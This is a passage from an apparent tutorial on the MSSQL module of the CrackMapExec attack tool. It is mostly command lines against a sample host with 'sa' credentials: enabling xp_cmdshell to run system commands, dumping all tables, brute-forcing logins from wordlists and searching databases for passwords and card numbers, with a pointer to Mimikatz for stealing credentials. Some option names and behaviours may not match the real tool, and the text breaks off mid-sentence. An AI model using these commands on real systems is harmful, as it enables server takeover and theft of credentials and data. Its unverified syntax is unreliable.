query: Execute a SQL query on the target database and display the results.
enable_xp_cmdshell: Enable the xp_cmdshell stored procedure on the target database, which allows executing arbitrary commands on the database server.
disable_xp_cmdshell: Disable the xp_cmdshell stored procedure on the target database.
dump: Dump the contents of a specific table or all tables from the target database.
brute: Perform a brute-force attack on the target database using a wordlist of usernames and passwords.
spider: Spider the target database and look for sensitive information such as passwords, credit card numbers, etc.
How to Use the --mssql Module?
To use the --mssql module, you need to have valid credentials for the target database. You can obtain them by using other CME modules such as --smb, --wmi, or --kerberos, or by using other tools such as Mimikatz or Impacket. Once you have the credentials, you can use the following syntax to run the --mssql module:
cme mssql <target> -u <username> -p <password> -d <database> --<action> <options>
For example, to execute a SQL query on the target database, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --query "SELECT @@version"
This will display the version of the SQL Server running on the target machine. To enable the xp_cmdshell stored procedure and execute a command on the target machine, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --enable_xp_cmdshell
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --query "EXEC xp_cmdshell 'whoami'"
This will display the user running the SQL Server service on the target machine. To dump all tables from the target database, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --dump
This will create a folder named cmedb-<target> in your current directory and save all tables as CSV files in it. To perform a brute-force attack on the target database, you can use:
cme mssql 192.168.1.10 --brute /usr/share/wordlists/usernames.txt /usr/share/wordlists/passwords.txt
This will try all combinations of usernames and passwords from the wordlists and report any valid credentials found. To spider the target database and look for sensitive information, you can use:
cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --spider
This will scan all tables and columns in the target database and look
c8f7815bcf